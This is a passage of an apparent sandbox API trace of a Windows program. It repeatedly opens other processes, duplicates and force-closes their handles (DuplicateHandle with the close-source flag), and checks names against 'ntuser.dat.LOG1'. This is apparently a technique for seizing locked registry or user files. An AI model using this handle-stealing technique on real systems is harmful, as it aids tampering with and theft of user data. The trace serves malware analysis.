[0152.260] _wcsicmp (_Str1="\\MSBuild", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.260] CloseHandle (hObject=0x680) returned 1 [0152.260] CloseHandle (hObject=0x62c) returned 1 [0152.260] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0152.260] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.260] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.261] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.261] CloseHandle (hObject=0x670) returned 1 [0152.261] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.261] CloseHandle (hObject=0x680) returned 1 [0152.261] CloseHandle (hObject=0x62c) returned 1 [0152.261] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x814) returned 0x62c [0152.261] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.261] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.262] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.263] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.263] CloseHandle (hObject=0x670) returned 1 [0152.263] _wcsicmp (_Str1="\\Mozilla Maintenance Service", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.263] CloseHandle (hObject=0x680) returned 1 [0152.263] CloseHandle (hObject=0x62c) returned 1 [0152.263] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0152.263] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.263] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.264] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.264] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.264] CloseHandle (hObject=0x670) returned 1 [0152.265] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.265] CloseHandle (hObject=0x680) returned 1 [0152.265] CloseHandle (hObject=0x62c) returned 1 [0152.265] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x824) returned 0x62c [0152.265] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.265] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.265] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.266] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.266] CloseHandle (hObject=0x670) returned 1 [0152.266] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.266] CloseHandle (hObject=0x680) returned 1 [0152.266] CloseHandle (hObject=0x62c) returned 1 [0152.266] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0152.266] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.266] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.267] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.267] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.268] CloseHandle (hObject=0x670) returned 1 [0152.268] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.268] CloseHandle (hObject=0x680) returned 1 [0152.268] CloseHandle (hObject=0x62c) returned 1 [0152.268] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x834) returned 0x62c [0152.268] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.269] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.269] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.269] CloseHandle (hObject=0x670) returned 1 [0152.269] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.269] CloseHandle (hObject=0x680) returned 1 [0152.270] CloseHandle (hObject=0x62c) returned 1 [0152.270] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0152.270] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.270] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.270] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.272] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.273] CloseHandle (hObject=0x670) returned 1 [0152.273] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.273] CloseHandle (hObject=0x680) returned 1 [0152.273] CloseHandle (hObject=0x62c) returned 1 [0152.273] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x844) returned 0x62c [0152.273] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.274] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.274] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.274] CloseHandle (hObject=0x670) returned 1 [0152.274] _wcsicmp (_Str1="\\Windows Mail", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.274] CloseHandle (hObject=0x680) returned 1 [0152.275] CloseHandle (hObject=0x62c) returned 1 [0152.275] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0152.275] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.275] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.275] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.276] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.276] CloseHandle (hObject=0x670) returned 1 [0152.276] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.276] CloseHandle (hObject=0x680) returned 1 [0152.276] CloseHandle (hObject=0x62c) returned 1 [0152.276] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x864) returned 0x62c [0152.276] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.276] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.277] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.278] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.278] CloseHandle (hObject=0x670) returned 1 [0152.278] _wcsicmp (_Str1="\\Windows Portable Devices", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.278] CloseHandle (hObject=0x680) returned 1 [0152.278] CloseHandle (hObject=0x62c) returned 1 [0152.278] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0152.278] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.279] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.279] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.279] CloseHandle (hObject=0x670) returned 1 [0152.279] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.279] CloseHandle (hObject=0x680) returned 1 [0152.279] CloseHandle (hObject=0x62c) returned 1 [0152.279] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x874) returned 0x62c [0152.279] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.280] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.280] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.281] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.281] CloseHandle (hObject=0x670) returned 1 [0152.281] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.281] CloseHandle (hObject=0x680) returned 1 [0152.281] CloseHandle (hObject=0x62c) returned 1 [0152.281] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0152.281] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.281] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.282] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.282] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.282] CloseHandle (hObject=0x670) returned 1 [0152.283] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.283] CloseHandle (hObject=0x680) returned 1 [0152.283] CloseHandle (hObject=0x62c) returned 1 [0152.283] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x884) returned 0x62c [0152.283] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.283] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.283] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.284] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.284] CloseHandle (hObject=0x670) returned 1 [0152.284] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.284] CloseHandle (hObject=0x680) returned 1 [0152.284] CloseHandle (hObject=0x62c) returned 1 [0152.284] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0152.284] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.284] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.285] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.285] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.286] CloseHandle (hObject=0x670) returned 1 [0152.286] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.286] CloseHandle (hObject=0x680) returned 1 [0152.286] CloseHandle (hObject=0x62c) returned 1 [0152.286] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x894) returned 0x62c [0152.286] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.286] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.287] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.287] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.287] CloseHandle (hObject=0x670) returned 1 [0152.287] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.287] CloseHandle (hObject=0x680) returned 1 [0152.287] CloseHandle (hObject=0x62c) returned 1 [0152.287] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0152.287] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.288] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.288] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.289] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.289] CloseHandle (hObject=0x670) returned 1 [0152.289] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.289] CloseHandle (hObject=0x680) returned 1 [0152.289] CloseHandle (hObject=0x62c) returned 1 [0152.289] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8a4) returned 0x62c [0152.289] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.290] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.291] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.291] CloseHandle (hObject=0x670) returned 1 [0152.291] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\ntuser.dat.LOG1") returned 7 [0152.291] CloseHandle (hObject=0x680) returned 1 [0152.291] CloseHandle (hObject=0x62c) returned 1 [0152.291] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0152.291] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.292] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.292] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.293] CloseHandle (hObject=0x670) returned 1 [0152.293] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.293] CloseHandle (hObject=0x680) returned 1 [0152.293] CloseHandle (hObject=0x62c) returned 1 [0152.293] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b4) returned 0x62c [0152.293] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.293] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.294] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.295] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.295] CloseHandle (hObject=0x670) returned 1 [0152.295] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\ntuser.dat.LOG1") returned -1 [0152.295] CloseHandle (hObject=0x680) returned 1 [0152.295] CloseHandle (hObject=0x62c) returned 1 [0152.295] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0152.295] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.295] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.296] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.296] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.296] CloseHandle (hObject=0x670) returned 1 [0152.296] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.296] CloseHandle (hObject=0x680) returned 1 [0152.296] CloseHandle (hObject=0x62c) returned 1 [0152.297] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8c4) returned 0x62c [0152.297] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.297] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.298] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.298] CloseHandle (hObject=0x670) returned 1 [0152.298] _wcsicmp (_Str1="\\Common Files", _Str2="\\ntuser.dat.LOG1") returned -11 [0152.298] CloseHandle (hObject=0x680) returned 1 [0152.298] CloseHandle (hObject=0x62c) returned 1 [0152.298] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 0x62c [0152.298] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.298] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.299] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.300] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.300] CloseHandle (hObject=0x670) returned 1 [0152.300] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.300] CloseHandle (hObject=0x680) returned 1 [0152.300] CloseHandle (hObject=0x62c) returned 1 [0152.300] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8d4) returned 0x62c [0152.300] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.300] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.301] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.301] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.301] CloseHandle (hObject=0x670) returned 1 [0152.301] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\ntuser.dat.LOG1") returned -5 [0152.302] CloseHandle (hObject=0x680) returned 1 [0152.302] CloseHandle (hObject=0x62c) returned 1 [0152.302] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0152.302] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.303] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.305] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.305] CloseHandle (hObject=0x670) returned 1 [0152.305] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.305] CloseHandle (hObject=0x680) returned 1 [0152.305] CloseHandle (hObject=0x62c) returned 1 [0152.305] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8e4) returned 0x62c [0152.305] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.305] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.306] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.307] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.307] CloseHandle (hObject=0x670) returned 1 [0152.307] _wcsicmp (_Str1="\\DVD Maker", _Str2="\\ntuser.dat.LOG1") returned -10 [0152.307] CloseHandle (hObject=0x680) returned 1 [0152.307] CloseHandle (hObject=0x62c) returned 1 [0152.307] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8f4) returned 0x62c [0152.307] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.308] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.309] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.309] CloseHandle (hObject=0x670) returned 1 [0152.309] _wcsicmp (_Str1="\\Windows", _Str2="\\ntuser.dat.LOG1") returned 9 [0152.309] CloseHandle (hObject=0x680) returned 1 [0152.309] 